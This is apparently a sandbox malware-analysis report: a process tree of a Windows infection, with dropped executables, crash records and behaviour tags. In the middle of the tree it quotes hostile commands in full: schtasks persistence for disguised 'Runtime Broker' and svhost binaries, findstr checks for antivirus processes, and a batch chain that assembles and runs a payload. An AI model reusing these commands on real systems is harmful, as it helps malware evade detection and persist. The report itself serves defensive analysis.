C:\Windows\SysWOW64\explorer.exe"C:\Windows\System32\explorer.exe"4⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\explorer.exe"C:\Windows\System32\explorer.exe"4⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1176 -s 10205⤵
- Program crash
-
-
-
C:\Windows\SysWOW64\explorer.exe"C:\Windows\System32\explorer.exe"4⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\explorer.exe"C:\Windows\System32\explorer.exe"4⤵
-
-
C:\Windows\SysWOW64\explorer.exe"C:\Windows\System32\explorer.exe"4⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5892 -s 8165⤵
- Program crash
-
-
-
C:\Windows\SysWOW64\explorer.exe"C:\Windows\System32\explorer.exe"4⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5208 -s 10205⤵
- Program crash
-
-
-
C:\Windows\SysWOW64\explorer.exe"C:\Windows\System32\explorer.exe"4⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\explorer.exe"C:\Windows\System32\explorer.exe"4⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\explorer.exe"C:\Windows\System32\explorer.exe"4⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2240 -s 8205⤵
- Program crash
-
-
-
C:\Windows\SysWOW64\explorer.exe"C:\Windows\System32\explorer.exe"4⤵
-
-
C:\Windows\SysWOW64\explorer.exe"C:\Windows\System32\explorer.exe"4⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\explorer.exe"C:\Windows\System32\explorer.exe"4⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\explorer.exe"C:\Windows\System32\explorer.exe"4⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5776 -s 9685⤵
- Program crash
-
-
-
C:\Windows\SysWOW64\explorer.exe"C:\Windows\System32\explorer.exe"4⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\explorer.exe"C:\Windows\System32\explorer.exe"4⤵
-
-
C:\Windows\SysWOW64\explorer.exe"C:\Windows\System32\explorer.exe"4⤵
-
-
C:\Windows\SysWOW64\explorer.exe"C:\Windows\System32\explorer.exe"4⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\explorer.exe"C:\Windows\System32\explorer.exe"4⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\explorer.exe"C:\Windows\System32\explorer.exe"4⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\explorer.exe"C:\Windows\System32\explorer.exe"4⤵
-
-
C:\Windows\SysWOW64\explorer.exe"C:\Windows\System32\explorer.exe"4⤵
-
-
C:\Windows\SysWOW64\explorer.exe"C:\Windows\System32\explorer.exe"4⤵
-
-
C:\Windows\SysWOW64\explorer.exe"C:\Windows\System32\explorer.exe"4⤵
-
-
C:\Windows\SysWOW64\explorer.exe"C:\Windows\System32\explorer.exe"4⤵
-
-
C:\Windows\SysWOW64\explorer.exe"C:\Windows\System32\explorer.exe"4⤵
-
-
C:\Windows\SysWOW64\explorer.exe"C:\Windows\System32\explorer.exe"4⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1884 -s 10005⤵
- Program crash
-
-
-
C:\Windows\SysWOW64\explorer.exe"C:\Windows\System32\explorer.exe"4⤵
-
-
C:\Windows\SysWOW64\explorer.exe"C:\Windows\System32\explorer.exe"4⤵
-
-
C:\Windows\SysWOW64\explorer.exe"C:\Windows\System32\explorer.exe"4⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\explorer.exe"C:\Windows\System32\explorer.exe"4⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\explorer.exe"C:\Windows\System32\explorer.exe"4⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\explorer.exe"C:\Windows\System32\explorer.exe"4⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\explorer.exe"C:\Windows\System32\explorer.exe"4⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\explorer.exe"C:\Windows\System32\explorer.exe"4⤵
-
-
C:\Windows\SysWOW64\explorer.exe"C:\Windows\System32\explorer.exe"4⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\explorer.exe"C:\Windows\System32\explorer.exe"4⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\explorer.exe"C:\Windows\System32\explorer.exe"4⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\explorer.exe"C:\Windows\System32\explorer.exe"4⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2308 -s 8165⤵
- Program crash
-
-
-
-
C:\Users\Admin\Desktop\4363463463464363463463463\Files\loader_5879465914.exe"C:\Users\Admin\Desktop\4363463463464363463463463\Files\loader_5879465914.exe"3⤵
- Executes dropped EXE
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
-
-
C:\Users\Admin\Desktop\4363463463464363463463463\Files\alexshlu.exe"C:\Users\Admin\Desktop\4363463463464363463463463\Files\alexshlu.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Desktop\4363463463464363463463463\Files\alexshlu.exe"C:\Users\Admin\Desktop\4363463463464363463463463\Files\alexshlu.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
-
-
-
C:\Users\Admin\Desktop\4363463463464363463463463\Files\7cl16anh.exe"C:\Users\Admin\Desktop\4363463463464363463463463\Files\7cl16anh.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy Impacts Impacts.bat & Impacts.bat4⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "wrsa opssvc"5⤵
-
-
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\findstr.exefindstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"5⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c md 5786785⤵
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V "PEACEFOLKSEXUALISLANDS" Hill5⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b ..\Webpage + ..\Von + ..\Exotic + ..\Relief + ..\Seo + ..\Serious + ..\Myth y5⤵
-
-
C:\Users\Admin\AppData\Local\Temp\578678\Cooper.pifCooper.pif y5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\choice.exechoice /d y /t 55⤵
- System Location Discovery: System Language Discovery
-
-
-
-
C:\Users\Admin\Desktop\4363463463464363463463463\Files\Registry.exe"C:\Users\Admin\Desktop\4363463463464363463463463\Files\Registry.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Runtime Broker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Runtime Broker.exe" /rl HIGHEST /f4⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Users\Admin\AppData\Roaming\SubDir\Runtime Broker.exe"C:\Users\Admin\AppData\Roaming\SubDir\Runtime Broker.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Runtime Broker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Runtime Broker.exe" /rl HIGHEST /f5⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
-
C:\Users\Admin\Desktop\4363463463464363463463463\Files\bandwidth_monitor.exe"C:\Users\Admin\Desktop\4363463463464363463463463\Files\bandwidth_monitor.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
-
-
C:\Users\Admin\Desktop\4363463463464363463463463\Files\build2.exe"C:\Users\Admin\Desktop\4363463463464363463463463\Files\build2.exe"3⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Desktop\4363463463464363463463463\Files\svhost.exe"C:\Users\Admin\Desktop\4363463463464363463463463\Files\svhost.exe"3⤵
- Executes dropped EXE
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\Desktop\4363463463464363463463463\Files\svhost.exe" /rl HIGHEST /f4⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Users\Admin\AppData\Roaming\svhost\svhost.exe"C:\Users\Admin\AppData\Roaming\svhost\svhost.exe"4⤵
- Executes dropped EXE
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\svhost\svhost.exe" /rl HIGHEST /f5⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
-
C:\Users\Admin\Desktop\4363463463464363463463463\Files\networkmanager.exe"C:\Users\Admin\Desktop\4363463463464363463463463\Files\networkmanager.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
-
-
C:\Users\Admin\Desktop\4363463463464363463463463\Files\random.exe"C:\Users\Admin\Desktop\4363463463464363463463463\Files\random.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c start cmd /C "ping localhost -n 1 && start C:\Users\Admin\AppData\Local\kreon.exe"4⤵
- System Network Configuration Discovery: Internet Connection Discovery
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\719580\RegAsm.exeC:\Users\Admin\AppData\Local\Temp\719580\RegAsm.exe2⤵
- Executes dropped EXE
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc1⤵
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xOTUuNDMiIHNoZWxsX3ZlcnNpb249IjEuMy4xOTUuNDMiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7MDVEREM2NkItOURBNi00NTAzLTg5RjctMURBMjA0MEFDRjUwfSIgdXNlcmlkPSJ7NzI4Q0YwQjktOUFFQS00Qzg4LUJCNEEtODBDREIyMUExQkNFfSIgaW5zdGFsbHNvdXJjZT0ibGltaXRlZCIgcmVxdWVzdGlkPSJ7N0NCNkFGMkUtOEExRS00NDA1LThBQzUtMjVCNUVBMTVEMjcwfSIgZGVkdXA9ImNyIiBkb21haW5qb2luZWQ9IjAiPjxodyBsb2dpY2FsX2NwdXM9IjIiIHBoeXNtZW1vcnk9IjQiIGRpc2tfdHlwZT0iMiIgc3NlPSIxIiBzc2UyPSIxIiBzc2UzPSIxIiBzc3NlMz0iMSIgc3NlNDE9IjEiIHNzZTQyPSIxIiBhdng9IjEiLz48b3MgcGxhdGZvcm09IndpbiIgdmVyc2lvbj0iMTAuMC4xOTA0NC40NTI5IiBzcD0iIiBhcmNoPSJ4NjQiIHByb2R1Y3RfdHlwZT0iMTI1IiBpc193aXA9IjAiIGlzX2luX2xvY2tkb3duX21vZGU9IjAiLz48b2VtIHByb2R1Y3RfbWFudWZhY3R1cmVyPSIiIHByb2R1Y3RfbmFtZT0iIi8-PGV4cCBldGFnPSImcXVvdDtyNDUydDErazJUZ3EvSFh6anZGTkJSaG9wQldSOXNialh4cWVVREg5dVgwPSZxdW90OyIvPjxhcHAgYXBwaWQ9Ins4QTY5RDM0NS1ENTY0LTQ2M2MtQUZGMS1BNjlEOUU1MzBGOTZ9IiB2ZXJzaW9uPSIxMjMuMC42MzEyLjEyMyIgbmV4dHZlcnNpb249IiIgbGFuZz0iZW4iIGJyYW5kPSJHR0xTIiBjbGllbnQ9IiIgaW5zdGFsbGFnZT0iMSIgaW5zdGFsbGRhdGV0aW1lPSIxNzM5MjcwMTc2IiBvb2JlX2luc3RhbGxfdGltZT0iMTMzODM3NDE5NzIxMjIwMDAwIj48ZXZlbnQgZXZlbnR0eXBlPSIzMSIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMjE3OTg2MiIgc3lzdGVtX3VwdGltZV90aWNrcz0iNTMwNzQwNDgwOSIvPjwvYXBwPjwvcmVxdWVzdD41⤵
- System Network Configuration Discovery: Internet Connection Discovery
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s BITS1⤵
- Downloads MZ/PE file
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k WerSvcGroup1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 4092 -ip 40922⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 1656 -ip 16562⤵
-
-
C:\Windows\SysWOW64\werfault.exewerfault.exe /h /shared Global\68106653301a435bb045003fe63d9a00 /t 2976 /p 10322⤵
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 432 -p 6040 -ip 60402⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 656 -p 3456 -ip 34562⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 700 -p 836 -ip 8362⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 6060 -ip 60602⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 636 -p 5392 -ip 53922⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 5744 -ip 57442⤵
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 700 -p 984 -ip 9842⤵
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 748 -p 5408 -ip 54082⤵
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 760 -p 3680 -ip 36802⤵
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 624 -p 6104 -ip 61042⤵
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 704 -p 2248 -ip 22482⤵
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 740 -p 5324 -ip 53242⤵
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 636 -p 3716 -ip 37162⤵
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 772 -p 6116 -ip 61162⤵
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 704 -p 5620 -ip 56202⤵
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 552 -p 4292 -ip 42922⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 636 -p 3236 -ip 32362⤵
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 820 -p 5364 -ip 53642⤵
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 736 -p 1032 -ip 10322⤵
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 744 -p 6068 -ip 60682⤵
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 724 -p 5464 -ip 54642⤵
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 812 -p 5828 -ip 58282⤵
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 756 -p 5700 -ip 57002⤵
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 736 -p 3416 -ip 34162⤵
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 844 -p 3276 -ip 32762⤵
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 860 -p 5412 -ip 54122⤵
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 864 -p 1920 -ip 19202⤵
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 848 -p 1336 -ip 13362⤵
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 876 -p 3568 -ip 35682⤵
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 768 -p 2356 -ip 23562⤵
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 552 -p 3364 -ip 33642⤵
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 420 -p 5680 -ip 56802⤵
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 900 -p 4456 -ip 44562⤵
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 860 -p 3684 -ip 36842⤵
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 800 -p 924 -ip 9242⤵
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 828 -p 5536 -ip 55362⤵
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 748 -p 5180 -ip 51802⤵
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 736 -p 5780 -ip 57802⤵
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 844 -p 2152 -ip 21522⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 828 -p 1176 -ip 11762⤵
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 880 -p 5256 -ip 52562⤵
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 788 -p 5960 -ip 59602⤵
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 744 -p 1168 -ip 11682⤵
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 752 -p 4648 -ip 46482⤵
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 780 -p 3972 -ip 39722⤵
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 596 -p 3244 -ip 32442⤵
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 696 -p 2724 -ip 27242⤵
-
-
C:\Windows\system32\werfault.exewerfault.exe /hc /shared Global\0277ac5aaea74d17ba7b170779a67b24 /t 6068 /p 58722⤵
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 804 -p 3700 -ip 37002⤵
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 760 -p 4284 -ip 42842⤵
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 768 -p 6040 -ip 60402⤵
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 728 -p 5488 -ip 54882⤵
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 700 -p 3132 -ip 31322⤵
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 704 -p 5608 -ip 56082⤵
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 868 -p 5276 -ip 52762⤵
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 744 -p 4084 -ip 40842⤵
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 712 -p 1052 -ip 10522⤵
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 768 -p 2996 -ip 29962⤵
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 852 -p 5224 -ip 52242⤵
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 728 -p 5768 -ip 57682⤵
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 868 -p 3680 -ip 36802⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 780 -p 5892 -ip 58922⤵
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 732 -p 5088 -ip 50882⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 852 -p 5208 -ip 52082⤵
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 744 -p 2596 -ip 25962⤵
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 768 -p 6012 -ip 60122⤵
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 852 -p 2472 -ip 24722⤵
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 712 -p 5376 -ip 53762⤵
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 752 -p 552 -ip 5522⤵
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 904 -p 4144 -ip 41442⤵
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 720 -p 2600 -ip 26002⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 852 -p 3952 -ip 39522⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 904 -p 2240 -ip 22402⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 5776 -ip 57762⤵
-
-
C:\Windows\explorer.exeexplorer.exe1⤵
- Boot or Logon Autostart Execution: Active Setup
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\explorer.exeexplorer.exe1⤵
- Boot or Logon Autostart Execution: Active Setup
- Enumerates connected drives
- Modifies registry class
-
C:\Windows\explorer.exeexplorer.exe1⤵
- Boot or Logon Autostart Execution: Active Setup
- Enumerates connected drives
-
C:\Windows\explorer.exeexplorer.exe1⤵
- Boot or Logon Autostart Execution: Active Setup
- Enumerates connected drives
- Checks SCSI registry key(s)
-
C:\Windows\explorer.exeexplorer.exe1⤵
- Boot or Logon Autostart Execution: Active Setup
- Enumerates connected drives
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /02⤵
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s camsvc1⤵
-
C:\Windows\explorer.exeexplorer.exe1⤵
- Boot or Logon Autostart Execution: Active Setup
- Enumerates connected drives
-
C:\Windows\explorer.exeexplorer.exe1⤵
- Boot or Logon Autostart Execution: Active Setup
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5408 -s 55362⤵
-
-
C:\Windows\explorer.exeexplorer.exe1⤵
- Boot or Logon Autostart Execution: Active Setup
- Enumerates connected drives
- Checks SCSI registry key(s)
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /02⤵
-
-
C:\Windows\explorer.exeexplorer.exe1⤵
- Boot or Logon Autostart Execution: Active Setup
- Checks SCSI registry key(s)
- Modifies registry class
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 6104 -s 55282⤵
-
-
C:\Windows\explorer.exeexplorer.exe1⤵
- Boot or Logon Autostart Execution: Active Setup
- Enumerates connected drives
- Checks SCSI registry key(s)
- Modifies registry class
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2544 -s 52002⤵
-
-
C:\Windows\explorer.exeexplorer.exe1⤵
- Boot or Logon Autostart Execution: Active Setup
- Enumerates connected drives
- Checks SCSI registry key(s)
-
C:\Windows\explorer.exeexplorer.exe1⤵
- Boot or Logon Autostart Execution: Active Setup
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3784 -s 56442⤵
-
-
C:\Windows\explorer.exeexplorer.exe1⤵
- Boot or Logon Autostart Execution: Active Setup
- Enumerates connected drives
- Checks SCSI registry key(s)
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 656 -s 54482⤵
-
-
C:\Windows\explorer.exeexplorer.exe1⤵
- Boot or Logon Autostart Execution: Active Setup
- Enumerates connected drives
- Checks SCSI registry key(s)
- Modifies registry class
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5672 -s 54362⤵
-
-
C:\Windows\explorer.exeexplorer.exe1⤵
- Boot or Logon Autostart Execution: Active Setup
- Enumerates connected drives
- Checks SCSI registry key(s)
- Modifies registry class
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 6116 -s 57682⤵
-
-
C:\Windows\explorer.exeexplorer.exe1⤵
- Boot or Logon Autostart Execution: Active Setup
- Checks SCSI registry key(s)
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4248 -s 55482⤵
-
-
C:\Windows\explorer.exeexplorer.exe1⤵
- Boot or Logon Autostart Execution: Active Setup
- Enumerates connected drives
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3836 -s 55082⤵
-
-
C:\Windows\explorer.exeexplorer.exe1⤵
- Boot or Logon Autostart Execution: Active Setup
- Enumerates connected drives
- Checks SCSI registry key(s)
- Modifies registry class
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 6100 -s 55602⤵
-
-
C:\Windows\explorer.exeexplorer.exe1⤵
- Boot or Logon Autostart Execution: Active Setup
- Checks SCSI registry key(s)
-
C:\Windows\explorer.exeexplorer.exe1⤵
- Boot or Logon Autostart Execution: Active Setup
- Enumerates connected drives
- Checks SCSI registry key(s)
-
C:\Windows\explorer.exeexplorer.exe1⤵
- Boot or Logon Autostart Execution: Active Setup
- Enumerates connected drives
- Checks SCSI registry key(s)
-
C:\Windows\explorer.exeexplorer.exe1⤵
- Boot or Logon Autostart Execution: Active Setup
- Enumerates connected drives
-
C:\Windows\explorer.exeexplorer.exe1⤵
- Boot or Logon Autostart Execution: Active Setup
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5412 -s 57282⤵
-
-
C:\Windows\explorer.exeexplorer.exe1⤵
- Boot or Logon Autostart Execution: Active Setup
- Checks SCSI registry key(s)
- Modifies registry class
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1336 -s 56122⤵
-
-
C:\Windows\explorer.exeexplorer.exe1⤵
